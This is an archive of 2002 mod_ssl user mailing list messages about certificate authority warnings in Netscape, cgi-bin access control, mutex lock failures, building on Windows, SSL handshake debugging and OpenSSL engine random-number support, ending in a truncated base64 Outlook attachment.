>Fax: 	(415) 901-2201			http://www.yipes.com
>
>Yipes is the defining provider of fully scalable bandwidth for 
>businesses.
>We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
>services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps 
>increments. 
>
>Yipes delivers this uniquely flexible service over the first nationwide
>system of optical IP networks.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 09:58:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18895; Mon, 15 Jul 2002 09:57:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA18839; Mon, 15 Jul 2002 09:56:17 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id JAA09955
	for ; Mon, 15 Jul 2002 09:56:13 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA15541
	for ; Mon, 15 Jul 2002 09:56:13 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: CCT issues with netscape and mod_ssl Urgent - On our production system.
Date: Mon, 15 Jul 2002 09:56:12 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BD2@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: CCT issues with netscape and mod_ssl Urgent - On our production system.
Thread-Index: AcIrxiHd1yjhUPqeR3qxJIjM3vLbkQADk1TA
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA18875
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It seems that the signing authority in the cert is not recognised by the browser... Look at the CA list in the browser to check (Tasks -> privacy and security -> security manager - certificates -> authorities). CA companies have to pay to be included by default in the browser's list and some don't bother to pay for minority browsers like Netscape...

Rgds,

Owen Boyle

>-----Original Message-----
>From: Christopher Welsh [mailto:cris@barwonwater.vic.gov.au]
>Sent: Montag, 15. Juli 2002 08:06
>To: modssl-users@modssl.org
>Subject: CCT issues with netscape and mod_ssl Urgent - On our 
>production
>system.
>
>
>Hello,
>
>
>I'm getting the following errors with netscape v 6.2.3 and 7 pre when 
>ssl connecting to my web server.
>
>
>
>There is a problem with the cct that identifies 
>www.bawonwater.vic.gov.au do you want to continue?
>
>The certificate was issued by a certificate authority that netscape 
>6.2.3 does not recognize.
>
>
>Can anyone help? I need to resolve this quickly. I'm sure this was not 
>happening before I upgraded to 1.3.26 with x.x.10 mod_ssl when the 
>security alert came out. Perhaps I missed something when I performed a 
>make install over the top of the old version.
>
>-- 
>Christopher Welsh
>Barwon Regional Water Authority,
>Geelong Victoria, 3216
>Voice: 03 52 262385, Mobile: 0409 562968
>
>
>
>***************************************************************
>******************************
>
>
>The information in this e-mail message and any files 
>transmitted with it
>are confidential
>and/or privileged and are intended only for the use of the 
>individual or
>entity to whom
>they are addressed.  If you received this message in error 
>please notify us
>immediately
>by telephone or return e-mail and delete all copies from your computer
>system, as your
>retention, distribution or copying of this message and files 
>is strictly
>prohibited.
>
>It is the recipient's responsibility to check this message and 
>files for
>viruses.
>
>***************************************************************
>********************************
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 10:02:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA19275; Mon, 15 Jul 2002 10:01:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id KAA19234; Mon, 15 Jul 2002 10:00:31 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA10271
	for ; Mon, 15 Jul 2002 10:00:30 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA15771
	for ; Mon, 15 Jul 2002 10:00:30 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: How to access control cgi-bin
Date: Mon, 15 Jul 2002 10:00:29 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA91CD@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: How to access control cgi-bin
Thread-Index: AcIqPdqePNSdWQWkSMaibzvpxh22yABl0LAQ
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA19264
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: liangbin li [mailto:liliangbin@hotmail.com]
>
>I install apache httpd server with mod_ssl. I broswer a access 
>controled 
>html file and it calls a programm under cgi-bin directory.

Is this what you want to happen?

>I want to know how I can set up access control with in the cgi-bin's 
>programm?

Real access control is done at the server level (HTTP protocol), i.e. a layer below the application like CGI. So you can't control HTTP authentication from CGI. You could use a CGI form to authenticate users and then serve them the CGI output (i.e. have the CGI process all data going to the user). This is a bit laborious and involves writing a mini-webserver in CGI... What's wrong with the built-in authentication scheme?

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 10:38:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21214; Mon, 15 Jul 2002 10:37:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.bernd-becker.de id KAA21126; Mon, 15 Jul 2002 10:36:15 +0200 (MET DST)
Received: from [192.168.130.195] (unknown [62.138.32.231])
	by mail.bernd-becker.de (Postfix on SuSE Linux eMail Server 3.0) with ESMTP id EC4A39E8B5
	for ; Mon, 15 Jul 2002 10:41:20 +0200 (CEST)
Date: Mon, 15 Jul 2002 10:33:20 +0200
From: Bernd Becker 
To: modssl-users@modssl.org
Subject: Apache 1.3: ssl_mutex_on failure and SEGV
Message-ID: <27760000.1026722000@[192.168.130.195]>
X-Mailer: Mulberry/2.2.0 (Linux/x86)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bernd Becker 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

on a machine running UnixWare 7.1.1 I have been observing the following in
error_log:
[12:13:00 2002] [warn] Failed to acquire global mutex lock
[12:13:00 2002] [warn] Failed to acquire global mutex lock
[12:13:00 2002] [warn] Failed to acquire global mutex lock
[12:13:17 2002] [notice] child pid 24071 exit signal Segmentation fault (11)

I am quite sure this is coming from the mod_ssl module
(with shared memory session cache shmht).

truss says the following:
...
fcntl(19, F_SETLKW, 0x08160110)                 Err#46 ENOLCK
...
where fd 19 seems to be /var/apache/run/ssl_mutex.

There are no more record locks available (too many file segments locked)
because the system maximum has been exceeded (quote from man fcntl).
Apache is not the culprit for the system running out of locks, but I
wanted to ask this question anyway:

there is no checking of the return code of ssl_mutex_on(), so I assume the 
session
cache in memory is being trashed by concurrent write operations, leading to 
the
SEGV. Shouldn't this be checked and e.g. the session cache not be used in 
such a
case (or some other error handling) ?


Regards,
Bernd
---
Bernd Becker

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 10:48:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21805; Mon, 15 Jul 2002 10:47:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA21741; Mon, 15 Jul 2002 10:47:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6F5F44CE73D; Mon, 15 Jul 2002 10:46:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 26B062870D; Mon, 15 Jul 2002 10:44:35 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id IAA14722; Mon, 15 Jul 2002 08:42:52 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6F6gKmG023941
	for ; Mon, 15 Jul 2002 16:42:50 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADD37182;
	Mon, 15 Jul 2002 16:42:20 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6F6gJcU014467
	for ; Mon, 15 Jul 2002 16:42:19 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpdWSaioC; Mon Jul 15 16:42:15 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6F6gEsL004495
	for modssl-users@modssl.org; Mon, 15 Jul 2002 16:42:14 +1000 (EST)
Date: Mon, 15 Jul 2002 16:42:14 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Mod_SSL for Windows 2000/NT/XP
Message-ID: <20020715164214.A3671@uow.edu.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

I am a new member to this group. I have a question which was asked on
2002-06-07 by Ike Ikonne (for which I could not locate any answer in
the list archives) so please forgive me for the repetition...

My situation is like Ike's: I too need to install mod_ssl and Open_SSL
(ie. require secure web transaction capabilities), with questions as
follows:

* How can I build OpenSSL and mod_ssl on NT or 2000 (ie. do I have to
  buy compiler software)?

* Alternatively, is there a sitfrom which I can download precompiled
  versions of (or an "installation Wizard" for) the above?

Please advise,
Thanks and kind regards,
Brendan Lloyd
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 14:56:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA05091; Mon, 15 Jul 2002 14:55:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailout09.sul.t-online.com id OAA05063; Mon, 15 Jul 2002 14:54:35 +0200 (MET DST)
Received: from fwd06.sul.t-online.de 
	by mailout09.sul.t-online.com with smtp 
	id 17U3Qo-0007JI-06; Mon, 15 Jul 2002 12:50:18 +0200
Received: from ANDREWM (510039956349-0001@[217.225.69.140]) by fmrl06.sul.t-online.com
	with smtp id 17U3Qk-0IVE2aC; Mon, 15 Jul 2002 12:50:14 +0200
From: "Andrew Smart" 
To: 
Subject: AW: FreeBSD SSL_Connect drama
Date: Mon, 15 Jul 2002 12:48:27 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
In-Reply-To: 
Importance: Normal
X-Sender: 510039956349-0001@t-dialin.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Smart" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Since I solved this problem for my site last night, I can give you a hint:

My SSL virtual server definition contained the name of the domain in it,
just like my other virtual servers.
Because of some reasons I don't understand right now this seems to confuse
apache.
After I changed the SSL virtual server-definition to explicitly have the
IP-address of the server instead of the domain/server-name it worked fine.

Hope this helps,
Andrew


> -----Ursprüngliche Nachricht-----
> Von: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]Im Auftrag von Glen Vallance
> Gesendet: Montag, 15. Juli 2002 02:36
> An: modssl-users@modssl.org
> Betreff: FreeBSD SSL_Connect drama
>
>
> Hi,
>
> This problem doesn't sound like it should be that uncommon, but I
> can't find
> any information on it.
>
> Environment:  FreeBSD 4.4, Apache 1.3.24, Mod SSL 2.8.8-1.3.24 [the right
> one?]
> Behaviour:  "You cannot connect to sol.gropep.com.au because of an unknown
> SSL error [-12281]"
>
> Looking at the situation with openssl s_client I get:
>
> sol# openssl s_client -connect sol.gropep.com.au:443 -state -debug
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> write to 0808D4C0 [0809E000] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 66 47 70 ab   ............fGp.
> 0060 - 9a 01 13 69 a4 cb 78 16-98 f8 35 5e 7b 24 7a d0   ...i..x...5^{$z.
> 0070 - a7 fa 83 48 6a bf 36 32-a3 3e 3f 8d               ...Hj.62.>?.
> SSL_connect:SSLv2/v3 write client hello A
> read from 0808D4C0 [080A4000] (7 bytes => 7 (0x7))
> 0000 - 0d 0a 0d 0a 3c 21 44                              .... SSL_connect:error in SSLv2/v3 read server hello A
> 36827:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:/usr/s
> rc/secure/lib/libssl/../../../crypto/openssl/crypto/../ssl/s23_clnt.c:462:
>
>
> Something is wrong with the configuration?
>
>
> Thanks,
>
>
> Glen
> _____________________________
> Glen Vallance
> Evolved Web Solutions Pty Ltd
>
> glen@evolved.com.au
> http://www.evolved.com.au/
>
> Phone +61 8 8363 0616
> Fax   +61 8 8132 1497
>
> This email and any files transmitted with it are confidential and intended
> solely for the use of the individual or entity to whom they are addressed.
> If you have received this email in error please notify info@evolved.com.au
>
> Views expressed in this message are those of the individual sender, except
> where the sender specifically states otherwise.
> _____________________________
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 19:15:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18365; Mon, 15 Jul 2002 19:14:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id TAA18331; Mon, 15 Jul 2002 19:13:14 +0200 (MET DST)
Subject: RAND function using OpenSSL 0.9.7
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C22C22.DE8F6585"
Date: Mon, 15 Jul 2002 19:12:59 +0200
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: RAND function using OpenSSL 0.9.7
Thread-Index: AcIsIt6EEW34Zu2ETFeTtwe3gqjEIg==
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C22C22.DE8F6585
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi all,


I try using OpenSSL0.9.7 with a crypto accelerator and it works fine for =
asymetric and symetric stuff, but it fails when trying to use ENGINE =
random (rand engine is not used, everything is done with classic =
software random).

Has someone solve this problem?


Regards=20
Fred

------_=_NextPart_001_01C22C22.DE8F6585
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable






RAND function using OpenSSL 0.9.7





Hi all,





I try using OpenSSL0.9.7 with a crypto accelerator and it works fine for =
asymetric and symetric stuff, but it fails when trying to use ENGINE =
random (rand engine is not used, everything is done with classic =
software random).



Has someone solve this problem?





Regards

Fred





------_=_NextPart_001_01C22C22.DE8F6585--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 19:18:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18526; Mon, 15 Jul 2002 19:17:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id TAA18502; Mon, 15 Jul 2002 19:16:35 +0200 (MET DST)
Received: from node2.unix.virginia.edu by mail.virginia.edu id aa02300;
          15 Jul 2002 13:16 EDT
Received: from localhost (jcw5q@localhost)
	by node2.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id NAA53636
	for ; Mon, 15 Jul 2002 13:16:33 -0400
X-Authentication-Warning: node2.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Mon, 15 Jul 2002 13:16:33 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: RAND function using OpenSSL 0.9.7
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 15 Jul 2002, Frederic DONNAT wrote:

> I try using OpenSSL0.9.7 with a crypto accelerator and it works fine
> for asymetric and symetric stuff, but it fails when trying to use
> ENGINE random (rand engine is not used, everything is done with
> classic software random).

Don't you have to compile mod_ssl with SSL_EXPERIMENTAL_ENGINE or
something like that?  Did you do that?  Or are you even talking about
mod_ssl here?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 19:32:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19379; Mon, 15 Jul 2002 19:31:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id TAA19284; Mon, 15 Jul 2002 19:30:12 +0200 (MET DST)
Subject: RE: RAND function using OpenSSL 0.9.7
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C22C25.3D57F4ED"
Date: Mon, 15 Jul 2002 19:29:57 +0200
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
X-MS-TNEF-Correlator: 
Thread-Topic: RAND function using OpenSSL 0.9.7
Thread-Index: AcIsI7hcccVY9kbySyeTjqe1Oaiw0AAAFWI9
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C22C25.3D57F4ED
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Cliff,

I compile using --enable-rule=3DSSL_EXPERIMENTAL like i ve seen it =
inorder to enable Openssl "ENGINE" use. (also set SSLCryptoDevice ".." =
in /conf/httpd.conf)

As i said it works fine for symetric (cipher, digest) and asymetric =
(RSA, DSA, DH) stuff! only rand one seems invalid.

In fact in OpenSSL 0.9.7 i have to change some part of code in =
apps/s_client.c (just call "e =3D setup_engine(bio_err, engine_id, 1);" =
before any RAND function call) to be able to use RAND redirection.

Fred

-----Original Message-----
From:	Cliff Woolley [mailto:jwoolley@apache.org]
Sent:	Mon 07/15/2002 7:16 PM
To:	modssl-users@modssl.org
Cc:=09
Subject:	Re: RAND function using OpenSSL 0.9.7

On Mon, 15 Jul 2002, Frederic DONNAT wrote:

> I try using OpenSSL0.9.7 with a crypto accelerator and it works fine
> for asymetric and symetric stuff, but it fails when trying to use
> ENGINE random (rand engine is not used, everything is done with
> classic software random).

Don't you have to compile mod_ssl with SSL_EXPERIMENTAL_ENGINE or
something like that?  Did you do that?  Or are you even talking about
mod_ssl here?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




------_=_NextPart_001_01C22C25.3D57F4ED
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IjoRAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAJgAAAFJFOiBSQU5EIGZ1bmN0aW9u
IHVzaW5nIE9wZW5TU0wgMC45LjcAogsBBYADAA4AAADSBwcADwATAB0AOQABAFkBASCAAwAOAAAA
0gcHAA8AEwAdADkAAQBZAQEJgAEAIQAAAEU2NUVGNENFMTA4ODQ4NEE5NDY0NEMyMUFFRDk1NkY4
AEYHAQOQBgAkCwAANwAAAAMAJgAAAAAAAwA2AAAAAABAADkA7fRXPSUswgEeAD0AAQAAAAUAAABS
RTogAAAAAAIBRwABAAAAMwAAAGM9dXM7YT0gO3A9WkVOQ09EO2w9RVhDSEFOR0UtVUxJUy0wMjA3
MTUxNzI5NTdaLTY3AAAeAEkAAQAAACYAAABSZTogUkFORCBmdW5jdGlvbiB1c2luZyBPcGVuU1NM
IDAuOS43AAAAQABOAIBu3F0jLMIBHgBaAAEAAAAOAAAAQ2xpZmYgV29vbGxleQAAAAIBWwABAAAA
PwAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAAAENsaWZmIFdvb2xsZXkAU01UUABqd29vbGxleUBh
cGFjaGUub3JnAAACAVwAAQAAABkAAABTTVRQOkpXT09MTEVZQEFQQUNIRS5PUkcAAAAAHgBdAAEA
AAAOAAAAQ2xpZmYgV29vbGxleQAAAAIBXgABAAAAPwAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAA
AENsaWZmIFdvb2xsZXkAU01UUABqd29vbGxleUBhcGFjaGUub3JnAAACAV8AAQAAABkAAABTTVRQ
OkpXT09MTEVZQEFQQUNIRS5PUkcAAAAAHgBmAAEAAAAFAAAAU01UUAAAAAAeAGcAAQAAABQAAABq
d29vbGxleUBhcGFjaGUub3JnAB4AaAABAAAABQAAAFNNVFAAAAAAHgBpAAEAAAAUAAAAandvb2xs
ZXlAYXBhY2hlLm9yZwAeAHAAAQAAACIAAABSQU5EIGZ1bmN0aW9uIHVzaW5nIE9wZW5TU0wgMC45
LjcAAAACAXEAAQAAABsAAAABwiwjuFxxxVj2RvJLJ5OOp7U5qLDQAAAVYj0AHgB0AAEAAAAYAAAA
bW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAHgAaDAEAAAAQAAAARnJlZGVyaWMgRE9OTkFUAB4AHQ4B
AAAAIgAAAFJBTkQgZnVuY3Rpb24gdXNpbmcgT3BlblNTTCAwLjkuNwAAAAIBCRABAAAAdQQAAHEE
AABFBwAATFpGdeVOFlQDAAoAcmNwZzEyNeIyA0N0ZXgFQQEDAff/CoACpAPkBxMCgA/zAFAEVj8I
VQeyESUOUQMBAgBjaOEKwHNldDIGAAbDESX2MwRGE7cwEiwRMwjvCfe2OxgfDjA1ESIMYGMAUHML
CQFkMzYWUAumEiBsOQaQZiwKogqECoBJIIkFoG1wAxBlIHUAkOBuZyAtLQnwAaAegAgtcnUegD1T
U0wAX0VYUEVSSU1ARU5UQUwgHQBr8R6QaSB2HpAUEAnwIUAPBUALgAWwBIEgdG8gcR80IE9wCfAE
EAMgIkEgoEdJTkUiHqFl6C4gKAdAcyKwFBEGABEgAENyeQUwb0RlxnYN4B6QIi4uJDALgIQgLwWg
bmYvaAJAqHBkLibSKR1aQQQgVSFQcwtwZCHidwWwa70EIGYLgB6QAhAFwHMGwKsUIAUQYySQYwUg
aASQICwgZGlnB5B0KRYgAHApEGEqWFJTQbUrUEQs80gr0CuwdQEghCEgAiBseSByK/LLAiAhg20o
oW52B0ApAPYuHVsDoGYA0CICIzMf8cAgMC45LjchQRPg/yFxIqET0R7gIYEDcB6QCrE5BUBvZh4h
AQAmgmFwwHBzL3NfYx0ACfC2dCdwJJBqHrAFQGMHQIsjoR6QPSTydXBfCfBCZynRKGJpbzbwchsr
QTcEXykAK1AxKTt9JDBiARAFsB6QAHAuYFLIQU5EKbB1bjEAN4D/A6A2AivQIqE5ACvgIwIioXck
UTmkGCFpGCA6My/rRu8YIR1aHxA+4U8FEDchB0B/BdAHkCjgK5A+4z2GA3A64wyCHOQgV28G8B6A
LmDOWwDAAxAioDpqKWBCAy5ANKAA0CsgLgWwZ10vHVQGYAIwQSRNOmEwN1AvMTUvAdAwFEA3QDox
NiBQTR1UVG9CwEEzBGEjgS0kURQAQGdHZEPSHVRDY0EkRCV1jGJqPLFBJFJlOjmtdx60MWsdWk8D
oEUhOJE19CBKH7AgRcIrUD3iBnGBKsBET05OQVQpUM8DYA6wQSAdaT4gHhAqkM8uYEwLMeQD8HRo
K+AeIPslgyvgYyYQHoAugCKgBcD/K/IpO1EGKhIsOCvyKlctw/krUGJ1IgEFQDDgAxAEIP53KyAD
oFGhHtI7pFEGI9T/LnMDcCSQLoM3BCFABCAiMN8FQCRROIEl4ASQeVMwHtL/XIFbcCnhUxJRBjUQ
LDAN0bszQQGAdwrAHpBbRCkv6+pEAiAnBUB5CGAyWB5F/QRhXyOCUxMf/iAgWuQFsD8dVDNSXaQh
A1MwVGA/IP8tICkBYfJbcGbmPzAr4DlB72HyXVFZYQdAax7SAaAIYM50HVRjNishZT8+LBzzvR1a
X21/bo9vn3CvXyg1f0ODUXACMASQMOEykzFmKF9jNSvQdI8pUHWwLkg+VfdH4QYANtBwF8EF0EKB
HtJ+TAQABUB4j3jSR29IekH/WHADcQ6wKRB4Q3fAH0ArkGcFwH0feUlhaiJBA3BvC3qvHVp9gUAA
AAAeADUQAQAAAEcAAAA8QTlFRTAxMkMwNjg1Q0I0ODk4QTcwRUI0NTk0QTZDQTcxMkU2Q0NAZXhj
aGFuZ2UtdWxpcy51bGlzLnplbmNvZC5jb20+AAAeAEcQAQAAAA8AAABtZXNzYWdlL3JmYzgyMgAA
CwDyEAEAAAAfAPMQAQAAAFgAAABSAEUAJQAzAEEAIABSAEEATgBEACAAZgB1AG4AYwB0AGkAbwBu
ACAAdQBzAGkAbgBnACAATwBwAGUAbgBTAFMATAAgADAALgA5AC4ANwAuAEUATQBMAAAACwD2EAAA
AABAAAcwY2XkDSQswgFAAAgwNqdiPSUswgEDAN4/5AQAAAMA8T8JAAAAHgD4PwEAAAAQAAAARnJl
ZGVyaWMgRE9OTkFUAAIB+T8BAAAAYAAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAvTz1a
